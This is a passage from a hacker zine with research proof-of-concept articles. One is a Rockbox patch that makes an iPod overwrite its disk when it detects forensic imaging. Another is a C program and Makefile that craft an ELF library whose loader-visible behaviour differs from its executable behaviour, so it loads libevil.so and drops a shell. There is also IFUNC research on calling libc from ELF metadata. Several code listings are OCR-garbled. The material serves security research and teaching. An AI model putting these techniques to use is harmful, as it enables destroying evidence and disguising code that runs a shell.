must be the address of the function being called, and the third argument must be the address of the symbol
being dereferenced. Readers who can extend this into an arbitrary return to libc are urged to do it and share
the trick with others!
Remembering good times, Section 6 by FX tells us of an adventure with Barnaby Jack, one which features
a golden vending machine and some healthy advice to get the fuck out of Abu Dhabi.
Finally, in Section 7, we pass the collection plate and beg that you contribute some PoC of your own.
Articles should be short and sweet, written such that a clever reader will be inspired to build something
nifty.
1
2 iPod Antiforensics
by Travis Goodspeed
In my lecture introducing Active Disk Antiforensics at 29C3, I presented tricks for emulating a disk with
self defense features using the Facedancer board. This brief article will show you how to build your own
antiforensics disk out of an iPod by patching the Rockbox framework.
To quickly summarize that lecture: (1) USB Mass Storage is just a wrapper for SCSI. We can implement
these protocols and make our own disks. (2) A legitimate host will follow the filesystem and partition data
structure, while a malicious host—that is to say, a forensics investigator’s workstation—will read the disk
image from beginning to end. There are other ways to distinguish hosts, but this one is the easiest and has
fewest false positives. (3) By overwriting its contents as it is being imaged, a disk can destroy whatever
evidence or information the forensics investigator wishes to obtain.
There are, of course, exceptions to the above rules. Some high-end imaging software will image a disk
backward from the last sector toward the first. A law-enforcement forensics lab will never mount a volume
before imaging it, but an amateur or a lab less concerned with a clean prosecution might just copy the
protected files out of the volume.
Finally, there is the risk that an antiforensics disk might be identified as such by a forensics investigator.
The disk’s security relies upon the forensics technician triggering the erasure, and it won’t be sufficient if the
technician knows to work around the defenses. For example, he could revert to the recovery ROM or read
the disk directly.
2.1 Patching Rockbox
Rockbox exposes its hard disk to the host through USB Mass Storage, where handler functions implement
each of the different SCSI commands needed for that protocol. To add antiforensics, it is necessary only to
hook two of those functions: READ(10) and WRITE(10).
Infirmware/usbstack/usb storage.c of the Rockbox source code, blocks are read in two places. The
first of these is in handle scsi(), near the SCSI READ 10 case. At the end of this case, you should see a call
to send andread next(), which is the second function that must be patched.
Inboth of these, it is necessary to add code to both (1) observe incoming requests for illegal traffic and
(2) overwrite sectors as they are requested after the disk has detected tampering. Because of code duplication,
you will find that some data leaks out through send andread next() if you only patch handle scsi(). (If these
function names mean nothing to you, then you do not have the Rockbox code open, and you won’t get much
out of this article, now will you? Open the damn code!)
On an iPod, there will never be any legitimate reads over USB to the firmware partition. For our PoC,
let’s trigger self-destruction when that region is read. As this is just a PoC, this patch will provide nonsense
replies to reads instead of destroying the data. Also, the hardcoded values might be specific to the 2048-byte
sector devices, such as the more recent iPod Video hardware.
The following code should be placed in the SCSI READ 10 case of handle scsi(). tamperdetected
is a static bool that ought to be declared earlier in usbstorage.c . The same code should go into the
send andread next() function.
//These sectors are for 2048-byte sectors.
//Multiply by 4 for devices with 512-byte sectors.
if(cur_cmd.sector>=10000 && cur_cmd.sector<48000)
tamperdetected=true;
//This is the legitimate read.
cur_cmd.last_result = storage_read_sectors(
IF_MD2(cur_cmd.lun,) cur_cmd.sector,
MIN(READ_BUFFER_SIZE/SECTOR_SIZE, cur_cmd.count),
2
cur_cmd.data[cur_cmd.data_select]
);
//Here, we wipe the buffer to demo antiforensics.
if(tamperdetected){
for(i=0;i<READ_BUFFER_SIZE;i++)
cur_cmd.data[cur_cmd.data_select][i]=0xFF;
//Clobber the buffer for testing.
strcpy(cur_cmd.data[cur_cmd.data_select],
"Never gonna let you down.");
//Comment the following to make a harmless demo.
//This writes the buffer back to the disk,
//eliminating any of the old contents.
if(cur_cmd.sector>=48195)
storage_write_sectors(
IF_MD2(cur_cmd.lun,)
cur_cmd.sector,
MIN(WRITE_BUFFER_SIZE/SECTOR_SIZE, cur_cmd.count),
cur_cmd.data[cur_cmd.data_select]);
}
2.2 Shut up and play the single!
Neighbors who are too damned lazy to read this article and implement their own patches can grab my
Rockbox patches from https://github.com/travisgoodspeed/ .
2.3 Bypassing Antiforensics
This sort of an antiforensics disk can be most easily bypassed by placing the iPod into Disk Mode, which
can be done by a series of key presses. For example, the iPod Video is placed into Disk Mode by holding the
Select and Menu buttons to reboot, then holding Select and Play/Pause to enter Disk Mode. Be sure that
the device is at least partially charged, or it will continue to reboot. Another, surer method, is to remove
the disk from the iPod and read it manually.
Further, this PoC does not erase evidence of its own existence. A full and proper implementation ought
to replace the firmware partition at the beginning of the disk with a clean Rockbox build of the same revision
and also expand later partitions to fill the disk.
2.4 Neighborly Greetings
Kind thanks are due to The Grugq and Int80 for their work on traditional antiforensics of filesystems and
file formats. Thanks are also due to Scott Moulton for discretely correcting a few of my false assumptions
about real-world forensics.
Thanks are also due to my coauthors on an as-yet-unpublished paper which predates all of my active
antiforensics work but is being held up by the usual academic nonsense.
3
3 ELFs are dorky, Elves are cool
by Sergey Bratus and Julian Bangert
ELF ABI is beautiful. It’s one format to rule all the tools: when a compiler writes a love letter to the
linker about its precious objects, it uses ELF; when the RTLD performs runtime relocation surgery, it goes
by ELF; when the kernel writes an epitaph for an uppity process, it uses ELF. Think of a possible world
where binutils would use their own separate formats, all alike, leaving you to navigate the maze; or think of
how ugly a binary format that’s all things to all tools could turn out to be ( ∗cough∗ASN.1, X.509∗cough∗),
and how hard it’d be to support, say, ASLR on top of it. Yet ELF is beautiful.
Verily, when two parsers see two different structures in the same bunch of bytes, trouble ensues. A
difference in parsing of X.509 certificates nearly broke the internets’ SSL trust model1. The latest Android
“Master Key” bugs that compromised APK signature verification are due to different interpretation of archive
metadata by Java and C++ parsers/unzippers2– yet another security model-breaking parser differential.
Similar issues with parsing other common formats and protocols may yet destroy remaining trust in the open
Internet – but see http://langsec.org/ for how we could start about fixing them.
ELF is beautiful, but with great beauty there comes great responsibility – for its parsers.3So do all the
different binutils components as well as the Linux kernel see the same contents in an ELF file? This PoC
shows that’s not the case.
There are two major parsers that handle ELF data. One of them is in the Linux kernel’s implementation
ofexecve(2) that creates a new process virtual address space from an ELF file. The other – since the majority
of executables are dynamically linked – is the RTLD ( ld.so(8) , which on your system may be called something
like/lib64/ld-linux-x86-64.so.24, which loads and links your shared libraries – into the same address space.
It would seem that the kernel’s and the RTLD’s views of this address space must be the same, that is,
their respective parsers should agree on just what spans of bytes are loaded at which addresses. As luck and
Linux would have it, they do not.
The RTLD is essentially a complex name service for the process namespace that needs a whole lot of
configuration in the ELF file, as complex a tree of C structs as any. By contrast, the kernel side just looks
for a flat table of offsets and lengths of the file’s byte segments to load into non-overlapping address ranges.
RTLD’s configuration is held by the .dynamic section, which serves as a directory of all the relevant symbol
tables, their related string tables, relocation entries for the symbols, and so on.5The kernel merely looks
past the ELF header for the flat table of loadable segments and proceeds to load these into memory.
As a result of this double vision, the kernel’s view and the RTLD’s view of what belongs in the process
address space can be made starkly different. A libpoc.so would look like a perfectly sane library to RTLD,
calling an innocent “Hello world” function from an innocent libgood.so library. However, when run as an
executable it would expose a different .dynamic table, link in a different library libevil.so , and call a very
different function (in our PoC, dropping shell). It should be noted that ld.so is also an executable and can be
used to launch actual executables lacking executable permissions, a known trick from the Unix antiquity;6
however, its construction is different.
The core of this PoC, makepoc.c that crafts the dual-use ELF binary, is a rather nasty C program. It is,
in fact, a “backport-to-C” of our Ruby ELF manipulation tool Mithril7, inspired by ERESI8, but intended
for liberally rewriting binaries rather than for ERESI’s subtle surgery on the live process space.
1See “PKI Layer Cake” http://ioactive.com/pdfs/PKILayerCake.pdf by Dan Kaminsky, Len Sassaman, and Meredith L.
Patterson
2See, e.g., http://www.saurik.com/id/18 and http://www.saurik.com/id/17 .
3Cf. “The Format and the Parser”, a little-known variant of the “The Beauty and the Beast”. They resolved their parser
differentials and lived vulnlessly ever after.
4Just objcopy -O binary -j .interp /bin/ls /dev/stdout , wasn’t that easy? :)
5To achieve RTLD enlightenment, meditate on the grugq’s http://grugq.github.io/docs/subversiveld.pdf and mayhem’s
http://s.eresi-project.org/inc/articles/elf-rtld.txt , for surely these are the incarnations of the ABI Buddhas of our
age, and none has described the runtime dynamic linking internals better since.
6/lib/ld-linux.so <wouldbe-execfile>
7https://github.com/jbangert/mithril
8http://www.eresi-project.org/
4
/∗−−−−−−−−−−−−−−−−−−−− makepoc . c−−−−−−−−−−−−−−−−−−−−−−−∗ /
/∗
I met a p r o f e s s o r of arcane degree
Who said : Two v a s t and handwritten parsers
Live in the wild . Near them , in the dark
Half sunk , a s h a t t e r i n g e x p l o i t l i e s , whose frown ,
And wrinkled l i p , and sneer of cold command ,
T e l l t h a t i t s s c u l p t o r w e l l those papers read
Which yet survive , stamped on t h e s e l i f e l e s s things ,
The hand t h a t mocked them and the student t h a t fed :
And on the terminal t h e s e words appear :
”My name i s Turing , wrecker of proofs :
Parse t h i s unambigously , ye machine , and despair !”
Nothing b e s i d e s i s p o s s i b l e . Round the decay
Of t h a t c o l o s s a l wreck , boundless and bare
The lone and l e v e l root s h e l l s f o r k away .
−− I n s p i r e d by Edward S h e l l e y
∗/
#include <e l f . h >
#include <s t d i o . h >
#include <s t d l i b . h >
#include <s t r i n g . h >
#include <a s s e r t . h >
#define PAGESIZE 4096
s i z e t f i l e s z ;
char f i l e [3∗PAGESIZE ] ; // This i s the enormous b u f f e r holding the ELF f i l e .
// For neighbours running t h i s on an E l e ct r o n ic a BK,
// the s i z e might have to be reduced .
Elf64 Phdr∗find dynamic ( Elf64 Phdr∗phdr ) ; u i n t 6 4 t f i n d d y n s t r ( Elf64 Phdr∗phdr ) ;
/∗New memory l a y o u t
Memory mapped to F i l e O f f s e t s
0k ++++| | | ELF Header | −−−|
+|F i r s t|∗∗∗∗∗ | ( o r i g . code ) | | | LD. so / k e r n e l boundary assumes
+|Page| | ( r e a l . dynamic ) |<−|−+ the o f f s e t t h a t a p p l i e s on d i s k
4k + + = = = = = = + + = = = = = = = = = = = = = = = = + | | works a l s o in memory ; however ,
+| | | | i f phdrs are in a d i f f e r e n t
++>|Second|∗ | k e r n e l p h d r|<−−|−− segment , t h i s won ’ t hold .
|Page| ∗ | |
| | ∗ | |
+ = = = = = = +∗+ = = = = = = = = = = = = = = = = +
∗ | l d s o p h d r s|−−−|
|fake . dynamic |<−|
|w/ new dynstr |
= = = = = = = = = = = = = = = = = =
Somewhere f a r below , there i s the . data segment ( which we ignore )
∗/
int e l fm a g i c (){
Elf64 Ehdr∗ehdr = f i l e ;
Elf64 Phdr∗orig phdrs = f i l e + ehdr −>ep h o f f ;
Elf64 Phdr∗f i r s t l o a d ,∗phdr ;
int i =0;
5
//For the sake of b r e v i t y , we assume a l o t about the l a y o u t of the program :
a s s e r t ( f i l e s z >PAGESIZE ) ; // F i r s t 4K has the mapped parts of program
a s s e r t ( f i l e s z <2∗PAGESIZE ) ; //2nd 4K holds the program headers f o r the k e r n e l
//3rd 4k holds the program headers f o r l d . so +
// the new dynamic s e c t i o n and i s mapped j u s t above the program
for( f i r s t l o a d = orig phdrs ; f i r s t l o a d −>ptype !=PT LOAD; f i r s t l o a d ++);
a s s e r t (0 == f i r s t l o a d −>po f f s e t ) ;
a s s e r t (PAGESIZE >f i r s t l o a d−>pmemsz ) ; //2nd page of memory w i l l hold 2nd segment
u i n t 6 4 t base addr = ( f i r s t l o a d −>pvaddr &  ̃0 x f f f u l ) ;
//PHDRS as read by the k e r n e l ’ s execve () or dlopen () , but NOT seen by l d . so
Elf64 Phdr∗kernel phdrs = f i l e + f i l e s z ;
memcpy( kernel phdrs , orig phdrs , ehdr−>ephnum∗sizeof ( Elf64 Phdr ) ) ; // copy PHDRs
ehdr−>ep h o f f = ( char∗) kernel phdrs−f i l e ; // Point ELF header to new PHDRs
ehdr−>ephnum++;
//Add a new segment (PT LOAD) , see above diagram
Elf64 Phdr∗new load = kernel phdrs + ehdr−>ephnum−1 ;
new load−>ptype = PT LOAD;
new load−>pvaddr = base addr + PAGESIZE;
new load−>ppaddr = new load−>pvaddr ;
new load−>po f f s e t = 2∗PAGESIZE;
new load−>pf i l e s z = PAGESIZE;
new load−>pmemsz = new load−>pf i l e s z ;
new load−>pf l a g s = PF R|PFW;
// Disable l a r g e pages or l d . so complains when loading as a . so
for( i =0; i <ehdr−>ephnum ; i ++){
i f( kernel phdrs [ i ] . p type == PT LOAD)
kernel phdrs [ i ] . p a l i g n = PAGESIZE;
}
// Setup the PHDR t a b l e to be seen by l d . so , not k e r n e l ’ s execve ()
Elf64 Phdr∗ldso phdrs = f i l e + ehdr −>ep h o f f
−PAGESIZE // F i r s t 4K of program address space i s mapped in old segment
+ 2∗PAGESIZE; // O f f s e t of new segment
memcpy( ldso phdrs , kernel phdrs , ehdr−>ephnum∗sizeof ( Elf64 Phdr ) ) ;
// l d . so 2.17 determines load b i a s (ASLR) of main binary by l o o k i n g at PT PHDR
for( phdr=ldso phdrs ; phdr−>ptype != PT PHDR; phdr++);
phdr−>ppaddr = base addr + ehdr−>ep h o f f ; // l d . so e x p e c t s PHDRS at t h i s vaddr
// This isn ’ t used to f i n d the PHDR t a b l e , but by l d . so to compute ASLR s l i d e
// (main map−>la d d r ) as ( a c t u a l PHDR address ) −(PHDR address in PHDR t a b l e )
phdr−>pvaddr = phdr−>ppaddr ;
//Make a new . dynamic t a b l e at the end of the second segment ,
// to load l i b e v i l i n s t e a d of l i b g o o d
unsigned dynsz = find dynamic ( orig phdrs)−>pmemsz ;
Elf64 Dyn∗old dyn = f i l e + find dynamic ( orig phdrs)−>po f f s e t ;
Elf64 Dyn∗ldso dyn = ( char∗) ldso phdrs + ehdr−>ephnum∗sizeof ( Elf64 Phdr ) ;
memcpy( ldso dyn , old dyn , dynsz ) ;
// Modify address of dynamic t a b l e in l d s o p h d r s ( which i s only used in exec ( ) )
find dynamic ( ldso phdrs)−>pvaddr = base addr + ( char∗) ldso dyn−
6
f i l e−PAGESIZE;
//We need a new dynstr entry . Luckily l d . so doesn ’ t do range checks on s t r t a b
// o f f s e t s , so we j u s t s t i c k i t at the end of the f i l e
char∗l d s o n e e d e d s t r = ( char∗) ldso dyn +
ehdr−>ephnum∗sizeof ( Elf64 Phdr ) + dynsz ;
strcpy ( l d s o n e e d e d s t r , ” l i b e v i l . so ” ) ;
a s s e r t ( ldso dyn−>dtag == DT NEEDED) ; // r e p l a c e 1 s t dynamic entry , DT NEEDED
ldso dyn−>dun . d ptr = base addr + l d s o n e e d e d s t r−f i l e−
PAGESIZE−f i n d d y n s t r ( orig phdrs ) ;
}
void r e a d f i l e (){
FILE∗f= fopen ( ” t a r g e t . handchecked” , ” r ” ) ;
// provided binary because the PoC might not l i k e the output of your compiler
a s s e r t ( f ) ;
f i l e s z = fread ( f i l e ,1 , sizeof f i l e , f ) ; // Read the e n t i r e f i l e
f c l o s e ( f ) ;
}
void w r i t e f i l e (){
FILE∗f= fopen ( ” l i b p o c . so ” , ”w” ) ;
f w r i t e ( f i l e , sizeof f i l e , 1 , f ) ;
f c l o s e ( f ) ;
system ( ”chmod +xl i b p o c . so ” ) ;
}
Elf64 Phdr∗find dynamic ( Elf64 Phdr∗phdr ){
//Find the PT DYNAMIC program header
for( ; phdr−>ptype != PT DYNAMIC; phdr++);
return phdr ;
}
u i n t 6 4 t f i n d d y n s t r ( Elf64 Phdr∗phdr ){
//Find the address of the dynamic s t r i n g t a b l e
phdr = find dynamic ( phdr ) ;
Elf64 Dyn∗dyn ;
for( dyn = f i l e + phdr −>po f f s e t ; dyn−>dtag != DT STRTAB; dyn++);
return dyn−>dun . d ptr ;
}
int main ( )
{
r e a d f i l e ( ) ;
e l fm a g i c ( ) ;
w r i t e f i l e ( ) ;
}
#−−−−−−−−−−−−−−−−−−−− Makefile−−−−−−−−−−−−−−−−−−−−−−−
%.so : %.c
gcc−f p i c−shared−Wl,−soname ,$@−o $@ $ˆ
a l l : libgood . so l i b e v i l . so makepoc t a r g e t l i b p o c . so a l l i sw e l l
l i b p o c . so : t a r g e t . handchecked makepoc
. / makepoc
clean :
rm−f∗. so∗. o t a r g e t makepoc a l l i sw e l l
7
t a r g e t : t a r g e t . c libgood . so l i b e v i l . so
echo ”#d e f i n e INTERP\” ‘ objcopy−Obinary−j. i n t e r p\
/ bin / l s /dev/ stdout ‘\” ”>>i n t e r p . inc && gcc −o t a r g e t\
−Os−Wl,−rpath , .−Wl,−efoo−L .−shared−fPIC−lgood t a r g e t . c \
&& s t r i p−K foo $@ && echo ’ copy t a r g e t tot a r g e t . handchecked byhand ! ’
t a r g e t . handchecked : t a r g e t
cp $<$@; echo ”Beware , you compiled t a r g e t y o u r s e l f .\
Y M M V with your compiler , t h i s i sj u s t af r i e n d l y poc”
a l l i sw e l l : a l l i sw e l l . c l i b p o c . so
gcc−o $@−Wl,−rpath , .−lpoc−L . $<
makepoc : makepoc . c
gcc−ggdb−o $@ $ <
/∗−−−−−−−−−−−−−−−−−−−− t a r g e t . c−−−−−−−−−−−−−−−−−−−−−−−∗ /
#include <s t d i o . h >
#include ” i n t e r p . inc ”
const char myinterp [ ] a t t r i b u t e ( ( s e c t i o n ( ” . i n t e r p ” ) ) ) = INTERP;
extern int func ( ) ;
int foo (){
// p r i n t f (” C a l l i n g func \n ” ) ;
func ( ) ;
e x i t ( 1 ) ; //Needed , because there i s no c r t . o
}
/∗−−−−−−−−−−−−−−−−−−−− l i b g o o d . c−−−−−−−−−−−−−−−−−−−−−−−∗ /
#include <s t d i o . h >
int func (){p r i n t f ( ” Hello World\n” ) ;}
/∗−−−−−−−−−−−−−−−−−−−− l i b e v i l . c−−−−−−−−−−−−−−−−−−−−−−−∗ /
#include <s t d i o . h >
int func (){system ( ”/ bin /sh” ) ; }
/∗−−−−−−−−−−−−−−−−−−−− a l l i sw e l l . c−−−−−−−−−−−−−−−−−−−−−−−∗ /
extern int foo ( ) ;
int main ( int argc , char∗∗argv )
{
foo ( ) ;
}
3.1 Neighborly Greetings and \cite{}s:
Our gratitude goes to Silvio Cesare, the grugq, klog, mayhem, and Nergal, whose brilliant articles in Phrack
and elsewhere taught us about the ELF format, runtime, and ABI. Special thanks go to the ERESI team, who
set a high standard of ELF (re)engineering to follow. Skape’s article Uninformed 6:3 led us to re-examine
ELF in the light of weird machines, and we thank .Bx for showing how to build those to full generality.
Last but not least, our view was profoundly shaped by Len Sassaman and Meredith L. Patterson’s amazing
insights on parser differentials and their work with Dan Kaminsky to explore them for X.509 and other
Internet protocols and formats.
8
4 The Pastor Manul Laphroaig’s First Epistle to Hacker Preachers
of All Hats, in the sincerest hope that we might shut up about
hats, and get back to hacking.
First, I must caution you to cut out the Sun Tsu quotes. While every good speaker indulges in quoting from
good books of fiction or philosophy, verily I warn you that this can lead to unrighteousness! For when we
tell beginners to study ancient philosophy instead of engineering, they will become experts in the Art of War
and not in the Art of Assembly Language! They find themselves reading Wikiquote instead of Phrack, and
we are all the poorer for it!
I beg you: Rather than beginning your sermons with a quote from Sun Tzu, begin them with nifty little
tricks which the laity can investigate later. For example, did you know that ‘strings -n 20 /.bitcoin/blk0001.dat‘
dumps ASCII art portraits of both Saint Sassaman and Ben Bernanke? This art was encoded as fake public
keys used in real transactions, and it can’t be removed without undoing all Bitcoin transactions since it was
inserted into the chain. The entire Bitcoin economy depends upon the face of the chairman of the Fed not
being removed from its ledger! Isn’t that clever?
Speaking of cleverness, show respect for it by citing your scripture in chapter and verse. Phrack 49:14
tells us of Aleph1’s heroic struggle to explain the way the stack really works, and Uninformed 6:2 is the
harrowing tale of Johnny Cache, H D Moore, and Skape exploiting the Windows kernel’s Wifi drivers with
beacon frames and probe responses. These papers are memories to be cherished, and they are stories worth
telling. So tell them! Preach the good word of how the hell things actually work at every opportunity!
Don’t just preach the gospel, give the good word on paper. Print a dozen copies of a nifty paper and
give them away at the next con. Do this at Recon, and you will make fascinating friends who will show you
things you never knew, no matter how well you knew them before. Do this at RSA–without trying to sell
anything–and you’ll be a veritable hero of enlightenment in an expo center of half-assed sales pitches and
booth babes. Kill some trees to save some souls!
Don’t just give papers that others have written. Give early drafts of your own papers, or better still your
own documented 0day. Nothing demonstrates neighborliness like the gift of a good exploit.
Further, I must warn you to ignore this Black Hat / White Hat nonsense. As a Straw Hat, I tell you
that it is not the color of the hat that counts; rather, it is the weave. We know damned well that patching a
million bugs won’t keep the bad guys out, just as we know that the vendor who covers up a bug caused by his
own incompetence is hardly a good guy. We see righteousness in cleverness, and we study exploits because
they are so damnably clever! It is a heroic act to build a debugger or a disassembler, and the knowledge of
how to do so ought to be spread far and wide.
First, consider the White Hats. Black Hats are quick to judge these poor fellows as do-gooders who
kill bugs. They ask, “Who would want to kill such a lovely bug, one which gives us such clever exploits?”
Verily I tell you that death is a necessary part of the ecosystem. Without neighbors squashing old bugs,
what incentive would there be to find more clever bugs or to write more clever exploits? Truly I say to the
Black Hats, you have recouped every dollar you’ve lost on bugfixes by the selective pressure that makes your
exploits valuable enough to sustain a market!
Next, consider the Black Hats. White Hat neighbors are still quicker to judge these poor fellows, not so
much for selling their exploits as for hoarding their knowledge. A neighbor once told me, “Look at these
sinners! They hide their knowledge like a candle beneath a basket, such that none can learn from it.” But
don’t be so quick to judge! While it’s true that the Black Hats publish more slowly, do not mistake this
for not publishing. For does not a candle, when hidden beneath a basket, soon set the basket alight and
burn ten times as bright? And is not self-replicating malware just a self-replicating whitepaper, written in
machine language for the edification of those who read it? Verily I tell you, even the Black Hats have a
neighborliness to them.
So please, shut about hats and get back to the code.
—M. Laphroaig
Postscript: This little light of mine, I’m gonna let it shine!
9
5 Returning from ELF to Libc
by Rebecca “Bx” Shapiro
Dear friends,
As you may or may not know, demons lurk within ELF metadata. If you have not yet been introduced
to these creatures, please put this paper down and take a look at either our talk given at 29C39, or our
soon-to-be released WOOT publication (in August 2013).
Although the ability to treat the loader as a Turing-complete machine is Pretty Neat, we realize that
there are a lot of useful computation vectors built right into the libraries that are mapped into the loader
and executable’s address space. Instead of re-inventing the wheel, in this POC sermon we’d like to begin
exploring how to harness the power given to us by the perhaps almighty libc.
The System V amd64 ABI scripture10in combination with the eglibc-2.17 writings have provided us ELF
demon-tamers with the mighty useful IFUNC symbol. Any symbol of type IFUNC is treated as an indirect
function – the symbol’s value is treated as a function, which takes no arguments, and whose return value is
the patch.
The question we will explore from here on is: Can we harness the power of the IFUNC to invoke a piece
of libc?
After vaguely thinking about this problem for a couple of months, we have finally made progress towards
the answer.
Consider the exit() library call. Although one may question why we would want to craft metadata that
causes a exit() to be invoked, we will do so anyway, because it is one of the simplest calls we can make,
because the single argument it takes is not particularly important, and success is immediately obvious.
To invoke exit(), we must lookup the following information when we are compiling the crafted metadata
into some host executable. This is accomplished in three steps, as we explain in our prior work.
1. The location of exit() in the libc binary.
2. The location of the host executable’s dynamic symbol table.
3. The location of the host executable’s dynamic relocation table.
To invoke exit(), we must accomplish the following during runtime:
1. Lookup the base address of libc.
2. Use this base address to calculate the location of exit() in memory.
3. Store the address of exit() in a dynamic IFUNC symbol.
4. Cause the symbol to be resolved.
. . . and then there was exit()!
Our prior work has demonstrated how to accomplish the first two tasks. Once the first two tasks have
been completed at runtime, we find ourselves with a normal symbol (which we will call symbol 0) whose
value is the location of exit(). At this point we have two ways to proceed: we can
(1) have a second dynamic symbol (named symbol 1) of type IFUNC and have relocation entry of type
RX86 6464 which refers to symbol 0 and whose offset is set to the location of symbol 1’s values, causing
the location of ext() to be copied into symbol 1,
-or-
(2) update the type of the symbol that already has the address of exit() to that it becomes an IFUNC.
This can be done in a single relocation entry of type R X86 64, whose addend is that which is copied to the
9https://www.youtube.com/watch?v=dnLYoMIBhpo
10http://www.uclibc.org/docs/psABI-x86_64.pdf
10
first 8 bytes of symbol 0. If we set the addend to 0x0100000a00000000 , we will find that the symbol type
will become 0x0a (IFUNC), the symbol shndx will be set as 01 so the IFUNC is treated as defined, and the
other fields in the symbol structure will remain the same.
After our metadata that sets up the IFUNC, we need a relocation entry of type R X86 6464 that
references our IFUNC symbol, which will cause exit() to be invoked.
At this moment, you may be wondering how it may be possible to do more interesting things such as have
control of the argument passed to the function call. It turns out that this problem is still being researched.
In eglibc-2.17, at the time the IFUNC is called, the first argument is and will always be 0, the second
argument is the address of the function being called, and the third argument the addressed of the symbol
being referenced. Therefore at this level exec(0) is always called. It will clearly take some clever redirection
magic to be able to have control over the function’s arguments purely from ELF metadata.
Perhaps you will see this as an opportunity to go on a quest of ELF-discovery and be able to take this
work to the next level. If you do discover a path to argument control, we hope you will take the time to
share your thoughts with the wider community.
Peace out, and may the Manul always be with you.
11
6 GTFO or #FAIL
by FX of Phenoelit
To honor the memory of the great Barnaby Jack, we would like to relate the events of a failed POC. It
happened on the second day of the Black Hat Abu Dhabi conference in 2010 that the hosts, impressed by
Barnaby’s presentation on ATMs,11pointed out that the Emirates Palace hotel features a gold ATM12. So
they asked him to see if he could hack that one too.
Never one to reject challenges or fun to be had, Barns gathered a bunch of fellow hackers, who shall
remain anonymous in this short tale, to accompany him to the gold ATM. Sufficient to say, yours truly was
among them. Thus it happened that a bunch of hackers and a number of hosts in various white and pastel
colored thawbs went to pay the gold ATM a visit. Our hosts had assured everyone in the group that it was
totally OK for us to hack the machine, as long as they were with us.
6.1 The POC
While the gold ATM, being plated with gold itself, looked rather solid13, a look at the back of the machine
revealed a messy knot of cables, the type of wiring normally found on a Travis Goodspeed desk. Since the
machine updates the gold pricing information online, we obviously wanted to have a look at the traffic. We
therefore disconnected the flimsy network connections and observed the results, of which there were initially
none to be observed, except for the machine to start beeping in an alarming way.
Nothing being boring, we decided to power cycle the machine and watch it boot. For that, yours truly
got behind it and used his considerable power cable unplugging skills to their fullest extent. Interestingly
enough, the gold ATM stayed operational, obviously being equipped with the only Uninterruptable Power
Source (UPS) in the world that actually provides power when needed.
Reappearing from behind the machine, happily holding the unplugged network and power cables, yours
truly observed the group of hosts being already far away and the group of hackers following close behind.
Inverting their vector of movement, the cause of the same became obvious with the approaching storm
troopers of Blackwater quality and quantity. Therefore, yours truly joined the other hackers at considerable
speed.
6.2 The FAIL
Needless to say, what followed was a tense afternoon of drinking, waiting, and considering exit scenarios from
a certain country, depending on individual citizenships, while powers to be were busy turning the incident
into a non-issue.
The #FAIL was quickly identified as the inability of the fellowship of hackers to determine rank and
therefore authority of people that all wear more or less the same garments. What had happened was that
the people giving authority to hack the machine actually did not possess said authority in the first place or,
alternatively, had pissed off someone with more authority.
The failed POC pointed out the benefits of western military uniforms and their rank insignia quite clearly.
6.3 Neighborly Greetings
Neighborly greetings are in order to Mr. Nils, who, upon learning about the incident, quietly handed the
local phone number of the German embassy to yours truly.
11https://www.blackhat.com/html/bh-ad-10/bh-ad-10-archives.html\#Jack
12http://www.nydailynews.com/2.1353/abu-dhabi-emirates-palace-hotel-sports-vending-machine-gold-article-1.
449348
13http://www.gold-to-go.com/en/company/history/
12
7 A Call for PoC
by Rt. Revd. Pastor Manul Laphroaig
We stand, sit, or simply relax and chill on the shoulders of the giants, Phrack andUninformed . They
pushed the state-of-the-art forward mightily with awesome, deep papers and at times even with poetry to
match. And when a single step carries you forward by a measure of academic years, it’s OK to move slowly.
But for the rest of us dwarves, running around or lounging on those broad shoulders can be so much fun!
A hot PoC is fun to toss to a neighbor, and who knows what some neighbor will cook up with it for the
shared roast of the vuln-beast? A neighbor might think, “my PoC is unexploitable” or “it is too simple,”
but verily I tell you, one neighbor’s PoC is the missing cog for another neighbor’s 0day. How much PoC is
hoarded and lies idle while its matching piece of PoC wastes away in another hoard? Let’s find out!
7.1 Author guidelines
It is easy to prepare your paper for submission to IJPoC ∥GTFO in seven easy steps.
1. If you have a section called Introduction or some such nonsense, replace it with a two-sentence statement
of why the reader who doesn’t care about the subject after reading your abstract should care, and a
link to a good tutorial. Some caring neighbor must have spent a great deal of effort writing it already,
and who needs a hundred little one-pagers, all alike, on top of that?
2. If you have a section called Motivation , see item 1.
3. Scan your paper for tables. If you find a table, replace it with an equivalent piece of code. Repeat.
This is important.
4. Scan your paper for diagrams of the boxes-and-arrows kind. Unless the boxes are code basic blocks,
there had better be text on the arrows detailing exactly what is being sent on that arrow. If in doubt,
replace with equivalent code.
5. If you have a section called Related work , replace it with a neighborly Howdy to neighbors who did
that work, and cite it in the text of your paper that it’s related to.
6. If you have a section called Conclusion , replace it with a Howdy to neighbors who care. They have
already read your paper and need not be told what they just read.
7. Make up and apply the remaining steps in the spirit of the above, and may the Pastor or his trusty
Editor smile upon your submission!
7.2 Other Departments
For the proper separation of the goats and the lambs, there shall be various Departments. Each Department
shall have an Editor, excepting those that shall have two or more, so that they may fight with each other over
Important Decisions, and neighbors far and wide shall not be denied a proper helping of Hacker Drama.14
Editor at Large Rt. Revd. Pastor M.L.
Dept. of Bringing APT Home Cultural attach ́ e of the 41st Directorate
Dept. of Fail FX of Phenoelit
Ethics Board The Grugq
Dept. of Busting BS pipacs
Poet Laureate Ben Nagy15
Dept. of Rejections Academic Refugee
Dept. of Drama Xbf
Dept. of PHY Michael Ossmann
14All such Drama will be helpfully documented under the /drama/ URL, which is the practice we respectfully recommend to
all other esteemed venues.
13
Bullshit Busting Department. Remember that feeling when you are reading a paper and come to a
table or graph that just makes you wonder if bovine excreta have been used in its production? Well neighbors,
wonder no more, but send it to us and trust our world-renowned experts to call it out right and proper!
Rejected-from: Department of Rejections. The Pastor admonishes us, “Read the Fucking Paper!”
and sometimes also, “Write the Fucking Paper!” So even though sharing a drink, a story, and a hack with a
neighbor is still the most efficient method of knowledge transmission16, diligent neighbors also write papers.
And when a paper is written, why not enter it into the lottery otherwise known as the Academic Conference
Peer Review Process?
The process goes thusly: first you submit a paper, then you receive a rejection, along with the collectible
essays called Reviews. Sometimes these little pieces of text have little to do with your paper, but mostly
they explain how reviewers misunderstood what you had to say, and how they couldn’t care less. The art
of Reviewing is ancient, and goes back to ritual insults that rivals bellowed at each other before or instead
of battle. Although not all Reviewers take their art seriously, occasionally they manage to plumb the true
depths of trolling. In the words of the Pastor, “If you stand under the Ivory Tower long enough, you will
never want for fertilizer.”
The neighbor who collects the most creatively insulting Reviews wins. Submissions will be judged by our
Editors, and best ones will receive prizes.
